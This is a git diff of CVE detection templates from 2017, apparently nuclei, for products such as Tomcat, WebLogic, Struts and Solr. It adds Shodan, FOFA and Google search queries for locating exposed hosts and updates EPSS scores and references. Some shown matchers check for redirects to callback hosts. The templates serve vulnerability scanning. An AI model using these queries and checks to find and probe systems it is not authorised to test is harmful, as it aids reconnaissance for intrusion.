+# digest: 490a00463044022043d669b8b16a7809a014436363971008a066d6a54fbf8c71dbf3c34fca79a32f022044e14f43dee98fa0e180c5fe9276af9dca155fc864c7276e775e79ec1ac7eefa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml
index cff57e655a..aa79fb0c3b 100644
--- a/http/cves/2017/CVE-2017-1000029.yaml
+++ b/http/cves/2017/CVE-2017-1000029.yaml
@@ -25,6 +25,7 @@ info:
max-request: 1
vendor: oracle
product: glassfish_server
+ shodan-query: cpe:"cpe:2.3:a:oracle:glassfish_server"
tags: cve,cve2017,glassfish,oracle,lfi
http:
@@ -41,4 +42,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201d60e48b7384c0d1a88028a170cb3cfc91c63564ea817b87f9aa16c2e22f6277022100bd3d6df440665b69e2ed8f8e6bb14d03cea04068bdad5c4a9d18fbda46d3fe4d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml
index d81d35df5f..9d65bed09f 100644
--- a/http/cves/2017/CVE-2017-10075.yaml
+++ b/http/cves/2017/CVE-2017-10075.yaml
@@ -15,12 +15,13 @@ info:
- http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
- https://nvd.nist.gov/vuln/detail/CVE-2017-10075
- http://www.securitytracker.com/id/1038940
+ - https://github.com/d4n-sec/d4n-sec.github.io
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2017-10075
epss-score: 0.00451
- epss-percentile: 0.72424
+ epss-percentile: 0.75082
cpe: cpe:2.3:a:oracle:webcenter_content:11.1.1.9.0:*:*:*:*:*:*:*
metadata:
verified: true
@@ -55,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022010819a8a794f7913d5769d0d2a2fb4cb18e8bfc192f008923949764b6ee09b0902202313e8489672702f7e45dda26b24f2fc2e13a050288074feb90d080e5f3965af:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220136c0d583ed2e4adb2dd235c30da23fd33f94e875621e8280c11bd82d39cd70502201c341e9c1a91f9cfbb120bf3f1a7a78b252f9a411ca56d43d46ae1a82a471290:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml
index f1070a0a21..fcbaed68bb 100644
--- a/http/cves/2017/CVE-2017-10271.yaml
+++ b/http/cves/2017/CVE-2017-10271.yaml
@@ -27,6 +27,9 @@ info:
max-request: 2
vendor: oracle
product: weblogic_server
+ shodan-query: http.title:"oracle peoplesoft sign-in"
+ fofa-query: title="oracle peoplesoft sign-in"
+ google-query: intitle:"oracle peoplesoft sign-in"
tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle
http:
@@ -107,4 +110,4 @@ http:
- body == "{{randstr}}"
- status_code == 200
condition: and
-# digest: 4b0a00483046022100cc1685ff29667003d078f1649e722afd7019dd57bfcb94fd210d4624aebdf5fd022100adcdc269c9a84770a1817b96f2a5513541930282e2cdb048fdf74c9e31f8e4d9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402206cd33e205787396c506930ef99f891dab85057ff329031f7f3fafb03a177a46b02201d620b81bc277a73773aff87d2ecf134cde30d6de18c3e92c63af21ce47f0407:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml
index 5bdccda632..edf26c1b1b 100644
--- a/http/cves/2017/CVE-2017-11165.yaml
+++ b/http/cves/2017/CVE-2017-11165.yaml
@@ -29,6 +29,8 @@ info:
vendor: datataker
product: dt80_dex_firmware
shodan-query: http.title:"datataker"
+ fofa-query: title="datataker"
+ google-query: intitle:"datataker"
tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure
http:
@@ -53,4 +55,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022006d394921b0d5a7e04a3fd4c15837d306fae435cd168294f0200ce3c8b85c3de022100a28cc857dd6bb3e3b7914deddd731f3d7a9a721dd521879f221cff5c81597e3f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022008a11ab9e93218a47e8c16b1c9fb7c47dc5316032ba4ef91e67ffa755d13d10c0220410b5f535e0ff53ec6b40a7946b186706170f2fe33bec547ebe0d73e36ce2491:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml
index 08e502507c..650fe12483 100644
--- a/http/cves/2017/CVE-2017-11444.yaml
+++ b/http/cves/2017/CVE-2017-11444.yaml
@@ -13,20 +13,21 @@ info:
- https://github.com/intelliants/subrion/issues/479
- https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q
- https://nvd.nist.gov/vuln/detail/CVE-2017-11444
+ - https://github.com/d4n-sec/d4n-sec.github.io
+ - https://github.com/qazbnm456/awesome-cve-poc
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2017-11444
cwe-id: CWE-89
epss-score: 0.018
- epss-percentile: 0.86776
+ epss-percentile: 0.88111
cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: intelliants
product: subrion_cms
tags: cve2017,cve,sqli,subrion,intelliants
-
variables:
string: "{{to_lower(rand_base(5))}}"
hex_string: "{{hex_encode(string)}}"
@@ -46,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b2343cc25b19e1ca3bd71b44003198237cb5901c4d7ebc10cf40e0e9b49fd6bf02203ea67091fb55c946949988fcfc0c892ed7166c3f42c21f180e21804e89046e75:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml
index 8b2924e2e0..d950a4c815 100644
--- a/http/cves/2017/CVE-2017-11512.yaml
+++ b/http/cves/2017/CVE-2017-11512.yaml
@@ -30,6 +30,8 @@ info:
vendor: manageengine
product: servicedesk
shodan-query: http.title:"ManageEngine"
+ fofa-query: title="manageengine"
+ google-query: intitle:"manageengine"
tags: cve,cve2017,manageengine,lfr,unauth,tenable
http:
@@ -47,4 +49,4 @@ http:
- "fonts"
- "extensions"
condition: and
-# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c8643b425b2225117d524d7be9264b46eccff5a7a4daa81dc797d4d99d1d3190022064c2cf6f49d75d08b58057f6ee081777406f5020ed4851f896861f25d9b23f4e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml
index eeb8555f87..a426bd4003 100644
--- a/http/cves/2017/CVE-2017-11610.yaml
+++ b/http/cves/2017/CVE-2017-11610.yaml
@@ -20,14 +20,16 @@ info:
cvss-score: 8.8
cve-id: CVE-2017-11610
cwe-id: CWE-276
- epss-score: 0.97449
- epss-percentile: 0.99947
+ epss-score: 0.9745
+ epss-percentile: 0.9995
cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: supervisord
product: supervisor
shodan-query: http.title:"Supervisor Status"
+ fofa-query: title="supervisor status"
+ google-query: intitle:"supervisor status"
tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord
http:
@@ -65,4 +67,4 @@ http:
- ""
- ""
condition: and
-# digest: 490a0046304402201ad8588b21856c3e2e3cd9b2005efb3ab532688a03f56bfe6b6d4700adcfeb24022034a9d062ba9d9e21715b31256d921ca212e61f2266208cc6aac596dd63b3d22f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e8cffc12cec213b44e82f5d0f1309538f5f4bc2ad23587675ff7d09cebd9e62a022100b916e70325f22adc4270f97859f43348cd7b1a973716c95b908ba7ad5960e8b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml
index 98472b843b..fe3ecd31ed 100644
--- a/http/cves/2017/CVE-2017-12138.yaml
+++ b/http/cves/2017/CVE-2017-12138.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-12138
cwe-id: CWE-601
epss-score: 0.00062
- epss-percentile: 0.24419
+ epss-percentile: 0.26054
cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:*
metadata:
max-request: 2
@@ -46,4 +46,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d50b605dc5d7aa83bf305787cb9d0325014343d2d679489b1beb3eb6f3f7ba3d022100d6797bb1079261616de2593b32cc99578347d5cd577e9c0dcf05eab86d23b240:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml
index 58f8620d53..5f22928dd1 100644
--- a/http/cves/2017/CVE-2017-12149.yaml
+++ b/http/cves/2017/CVE-2017-12149.yaml
@@ -21,12 +21,15 @@ info:
cve-id: CVE-2017-12149
cwe-id: CWE-502
epss-score: 0.9719
- epss-percentile: 0.99802
+ epss-percentile: 0.9982
cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*
metadata:
max-request: 3
vendor: redhat
product: jboss_enterprise_application_platform
+ shodan-query: http.title:"jboss"
+ fofa-query: title="jboss"
+ google-query: intitle:"jboss"
tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat
http:
@@ -61,4 +64,4 @@ http:
status:
- 200
- 500
-# digest: 4b0a00483046022100ff07339440ed832558350d4e1909be660a2e00b68ca5777281e9e43e25195d8c022100f8797a6125eb10137f47322fda28c9b9075841e230dd91cacc849802e719af59:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204d54cb73bed897ffa2b528315d091376b9a653bfcc5b630be98c4e439fa6bbfc022100898e6d8834740b6c30ccff30123bac61289499278d2d43eebd86790ee9846fe0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml
index 6cc4cf375b..4c3a6444ab 100644
--- a/http/cves/2017/CVE-2017-12544.yaml
+++ b/http/cves/2017/CVE-2017-12544.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-12544
cwe-id: CWE-79
epss-score: 0.96723
- epss-percentile: 0.99637
+ epss-percentile: 0.99656
cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d6096a44064ff11a98cb2a3b0e4ea152b4e05f54485d6eb402c890697a0d3a7902205eda1523b2432502e783dad4db1ca29da4c467564da34d58541f827c4653f9ae:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c664906de3dbfed265f2b22def98c3be8115a90a6329d475abc146aed54b40590220232f4a4d20c1a0eabfee1bb1cf5bd6b769acee1a64e4ad2df72e4d026bb578ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml
index 4ee30b5e16..037219d39d 100644
--- a/http/cves/2017/CVE-2017-12583.yaml
+++ b/http/cves/2017/CVE-2017-12583.yaml
@@ -18,14 +18,16 @@ info:
cvss-score: 6.1
cve-id: CVE-2017-12583
cwe-id: CWE-79
- epss-score: 0.00117
- epss-percentile: 0.44712
+ epss-score: 0.00088
+ epss-percentile: 0.37623
cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dokuwiki
product: dokuwiki
shodan-query: http.title:"DokuWiki"
+ fofa-query: title="dokuwiki"
+ google-query: intitle:"dokuwiki"
tags: cve,cve2017,xss,dokuwiki
http:
@@ -48,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100828e4fcd424bd9ace343e46f8638dfd3c98669346297095a539c3a73737b30cc02200f2fd1fa4b5766d172ba09008728788b5b375c4373d3f8166751554ccbaad40c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml
index a62430eeb1..79c0e76f41 100644
--- a/http/cves/2017/CVE-2017-12611.yaml
+++ b/http/cves/2017/CVE-2017-12611.yaml
@@ -27,6 +27,9 @@ info:
max-request: 1
vendor: apache
product: struts
+ shodan-query: http.html:"apache struts"
+ fofa-query: body="struts problem report"
+ google-query: intitle:"struts2 showcase"
tags: cve,cve2017,apache,rce,struts
http:
@@ -43,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402205a7e846889ca9fef021f58b756f7db9e533f0fd2b079699079c49a442f3a817302200cac7efeb08c7927aba913cf747c76517a5bc78708c560f54c0cc97f9bad6598:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c9aea2d3b863eb9e683ecc823a4f5e3e8136f7b965fb0c3655538bdf440bcf3d02207491b538b2e590ae2204dc89543ee472e37827f2ef6fe8be39b73d8d715eff34:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml
index 208f3d300a..99dbd027d6 100644
--- a/http/cves/2017/CVE-2017-12615.yaml
+++ b/http/cves/2017/CVE-2017-12615.yaml
@@ -29,6 +29,8 @@ info:
vendor: apache
product: tomcat
shodan-query: title:"Apache Tomcat"
+ fofa-query: body="apache tomcat"
+ google-query: intitle:"apache tomcat"
tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive
http:
@@ -69,4 +71,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220379d0c5f5c4e19ce0caab699ea5aa078fc15bd35974269774e64b108806b79be0220532d269649aaacb9e369acb9a5d57da778c6df5d4a0afa2976c71e42e63a865c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022052d27ec94a5bec175557a6fa3ad9b58f2103d21b5701bffe972374a2a558f4ef0221008fea90ecc31126ba54f54ceb9000e1e65a774c4fb14d9d59205a1e3034977658:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml
index ff6836350e..fc1bc7621a 100644
--- a/http/cves/2017/CVE-2017-12617.yaml
+++ b/http/cves/2017/CVE-2017-12617.yaml
@@ -30,6 +30,8 @@ info:
vendor: apache
product: tomcat
shodan-query: html:"Apache Tomcat"
+ fofa-query: body="apache tomcat"
+ google-query: intitle:"apache tomcat"
tags: cve2017,cve,tomcat,apache,rce,kev,intrusive
http:
@@ -53,4 +55,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206cb00e6b5ee9e566dec0f1232554eaeda4e733f1c1dd46e3373f782288e400b0022062b74144462bbf9d3db2d69023b0aeacde9792aed39f01c1f567d838f5ff8a8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100cc85f49c32a20468afb964c828ef9f1807574d73dfa35714c5dccfd65af2968002210086f149634411289cfa9719c91807a76b9ee9cac520f34c029197b4e250aa1f61:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml
index ad974d371a..f1a7dc0fed 100644
--- a/http/cves/2017/CVE-2017-12629.yaml
+++ b/http/cves/2017/CVE-2017-12629.yaml
@@ -27,6 +27,9 @@ info:
max-request: 2
vendor: apache
product: solr
+ shodan-query: cpe:"cpe:2.3:a:apache:solr"
+ fofa-query: title="solr admin"
+ google-query: intitle:"apache solr"
tags: cve2017,cve,oast,xxe,vulhub,solr,apache
http:
@@ -51,4 +54,4 @@ http:
regex:
- '"name"\:"(.*?)"'
internal: true
-# digest: 4b0a00483046022100d4ea117d6f8a9a0bca004f0dd6abfb5a07ccac04c694a225786fb4891966d967022100e00d1081ae2657e9248dc91e946a1ff3d4745375c562b0273a375d31b5fe26c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204330e587ad6ed4278528de81d1036e457ce5f98dcbea54a5a68c136afad1a517022100bf95a11942363e362e6d5c911e5424746f92f4b7389d1dfa3dae055421ae4761:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml
index 651e869029..731c1e9791 100644
--- a/http/cves/2017/CVE-2017-12635.yaml
+++ b/http/cves/2017/CVE-2017-12635.yaml
@@ -27,6 +27,7 @@ info:
max-request: 1
vendor: apache
product: couchdb
+ shodan-query: product:"couchdb"
tags: cve2017,cve,couchdb,apache,intrusive
http:
@@ -63,4 +64,4 @@ http:
status:
- 201
- 409
-# digest: 4a0a0047304502203addb2b6e215dbff5fb9d55765b537597f5a37384aa1a41b3cdc23deecc6650a022100a8103420fbf062ce4677bc443e076baa92d8b4301fda6d2729268d370c359b60:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100bc6b8be9a2ae1adc600c103d9514a8a50b5ac05c0df9a3fff1d28ca643eea796022100cb77ea8c8138c7732c50f2462c4e131464f690c8b863c34b390b36042313667b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml
index 38169b306e..52bed4ee3f 100644
--- a/http/cves/2017/CVE-2017-12637.yaml
+++ b/http/cves/2017/CVE-2017-12637.yaml
@@ -28,6 +28,7 @@ info:
vendor: sap
product: netweaver_application_server_java
shodan-query: http.favicon.hash:-266008933
+ fofa-query: icon_hash=-266008933
tags: cve2017,cve,sap,lfi,java,traversal
http:
@@ -47,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204718a1f0fc5fb3d6d079a6f410f3203c6081f696613bfb4167a3aedfc56fb25f0221008e2ab021c906aea464f0dacae54694f30f2fa359573d32c35a6dda81f4e2204d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201eb1ef093708f91644f0c82c0d9c6777d4c6c74bac87d6825dbfae9b9c1c3e0c022100a426d0ad10d5f240c23ef2366faa7bac5d05066a4bd437841b5b5117c7133f78:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml
index 13ca931fa2..e601acc5ff 100644
--- a/http/cves/2017/CVE-2017-12794.yaml
+++ b/http/cves/2017/CVE-2017-12794.yaml
@@ -22,12 +22,13 @@ info:
cve-id: CVE-2017-12794
cwe-id: CWE-79
epss-score: 0.00219
- epss-percentile: 0.59827
+ epss-percentile: 0.59849
cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: djangoproject
product: django
+ shodan-query: cpe:"cpe:2.3:a:djangoproject:django"
tags: cve2017,cve,xss,django,djangoproject
http:
@@ -50,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022045d37d6d95dbcf0d99b3dd98b0548af3f80775282906963e91de53ddd88178e102207fef1b1e81deb1e461760619d1398e0d670d6ad1cb6109983598f16783a68676:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100efedfed019372fabd4ec462ca8128065b5c74513db3e9e565a9f74f45b7714c802206c5fe554f4a89a675c078661b0ad020fd9ccad466d1ecd821a5632bbc74749ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml
index 199cc5bec1..7034429878 100644
--- a/http/cves/2017/CVE-2017-14135.yaml
+++ b/http/cves/2017/CVE-2017-14135.yaml
@@ -21,13 +21,15 @@ info:
cve-id: CVE-2017-14135
cwe-id: CWE-78
epss-score: 0.96679
- epss-percentile: 0.99625
+ epss-percentile: 0.99643
cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: dreambox
product: opendreambox
shodan-query: title:"Dreambox WebControl"
+ fofa-query: title="dreambox webcontrol"
+ google-query: intitle:"dreambox webcontrol"
tags: cve,cve2017,dreambox,rce,oast,edb
http:
@@ -53,4 +55,4 @@ http:
- type: status
status:
- 200
-# digest: 490a004630440220698aef45fb765d687383961414979c5887eddf98121aa39048ba6f22392d374802202c71c44bdf2e149840f9cef78912bb4112076d87527c5b8a8744946b59339791:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a852b1b32792544b5b6f8d6a8e27f16fa2a21752d6257b99b98f4f76d92371c5022100ab03304decd9205f9b33ce74fd73fc0d5bf2996b53a7ad8af64aa0f5d8cca2f4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml
index e70352dcf8..f49b0dfc9b 100644
--- a/http/cves/2017/CVE-2017-14186.yaml
+++ b/http/cves/2017/CVE-2017-14186.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2017-14186
cwe-id: CWE-79
epss-score: 0.02948
- epss-percentile: 0.89847
+ epss-percentile: 0.90833
cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -30,6 +30,7 @@ info:
vendor: fortinet
product: fortios
shodan-query: port:10443 http.favicon.hash:945408572
+ fofa-query: body="/remote/login" "xxxxxxxx"
tags: cve2017,cve,fortigate,xss,fortinet
http:
@@ -52,4 +53,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502207fbfece700e8438f7ceb29e6cb4c1c3db50af2a9118f2a83bd83f1038f9e82d6022100a1093d8d2a97f1f72a728b30504eb3343bb6c5154e62389cc9ab4c4b6c8d3bf6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204bc3674dee1eb49c44df21ca6983aefdd561fa760cf2dc5b0511f8a420c15d9d022100be38b58aec0bb2d0baa6e086131178429de65c611eaed9a9e3a705252ed355aa:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml
index 20a95213bc..aab178fe4e 100644
--- a/http/cves/2017/CVE-2017-14524.yaml
+++ b/http/cves/2017/CVE-2017-14524.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2017-14524
cwe-id: CWE-601
epss-score: 0.00258
- epss-percentile: 0.6357
+ epss-percentile: 0.65482
cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -40,4 +40,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
-# digest: 4b0a00483046022100b32892e1ac671729ba982d52eb2d13b0e91ddae6c90c6b945a64e664d066cdb9022100eb9538968f1f58b108976f27fc2fa9ed8990673db1a2e1e1611c8fa3cfb12b8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207d0c495d738c812d3814d912d4d9a15c2068f31549dd5a6094fc26ff7e3fea5f022100bd6cecc315841b445bfd54e0577138bc398e39992b4fd808404389443dc7984c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml
index 3c902736d6..f73440c041 100644
--- a/http/cves/2017/CVE-2017-14535.yaml
+++ b/http/cves/2017/CVE-2017-14535.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2017-14535
cwe-id: CWE-78
epss-score: 0.04456
- epss-percentile: 0.91577
+ epss-percentile: 0.92413
cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -49,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 490a00463044022004c2c0b0bfc6a4b5299eb051ed30519d948e89244430b213fad2de42968d5d0602207a33257c46086bb05aa71c1e223813644d52d434ee6d268a0c78b20851101d53:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220212a0e411a7dfdddc9cefecce4b3e6da4e1d9ab9798165a2e1bdeb040a9f841a022100a563dc32c6b5450a3e77b949621ad22bde185127feaa4fe3221a49c5f800c6a1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml
index 14d594b33d..be742d8764 100644
--- a/http/cves/2017/CVE-2017-14622.yaml
+++ b/http/cves/2017/CVE-2017-14622.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2017-14622
cwe-id: CWE-79
epss-score: 0.00135
- epss-percentile: 0.47816
+ epss-percentile: 0.48695
cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -53,4 +53,4 @@ http:
- 'contains(body_2, "")'
- 'contains(body_2, "2kb-amazon-affiliates-store")'
condition: and
-# digest: 4b0a00483046022100df3637896184e2aa1264d2f8525ee71b55512c568590dccf0a39b3fac376f08002210095e59997264b698ff5ffe471f30c28dd486358c7dcbf06fb0bf4b2265c129718:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022068ae0e1c39c551c92415126fbe3278656ee8caa5459408d8cfb363321b1cfbe302203012f89152ceecc895732bca30da0ba6495ef79ff4f0a96af28e2a8a71e423b2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml
index a3aac17359..aaa705abb8 100644
--- a/http/cves/2017/CVE-2017-14651.yaml
+++ b/http/cves/2017/CVE-2017-14651.yaml
@@ -21,12 +21,15 @@ info:
cve-id: CVE-2017-14651
cwe-id: CWE-79
epss-score: 0.00144
- epss-percentile: 0.49339
+ epss-percentile: 0.50196
cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: wso2
product: api_manager
+ shodan-query: http.favicon.hash:1398055326
+ fofa-query: icon_hash=1398055326
+ google-query: inurl:"carbon/admin/login"
tags: cve,cve2017,wso2,xss
http:
@@ -47,4 +50,4 @@ http:
part: header
words:
- "text/html"
-# digest: 4a0a00473045022034f84ef006638a070852b350742ad77cd35f09148d0fbf4414429225a72f02e1022100c0814184d527fbae67d23da2ebd61e4645fa2c28e29bff5142f47a551b927bcf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203a8055a3c4f6a207fcbcbc251ad23ae0ca38a2c9274678e60f4d7f6794372f2b02203f743b45bed131ec4e534021b68216b4b0c4b0f37fd85ee60a3bb6258e21fbd5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml
index 9ffbdca378..5ba1da6df7 100644
--- a/http/cves/2017/CVE-2017-14849.yaml
+++ b/http/cves/2017/CVE-2017-14849.yaml
@@ -13,18 +13,21 @@ info:
- https://twitter.com/nodejs/status/913131152868876288
- https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/
- https://nvd.nist.gov/vuln/detail/CVE-2017-14849
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/Elsfa7-110/kenzer-templates
classification:
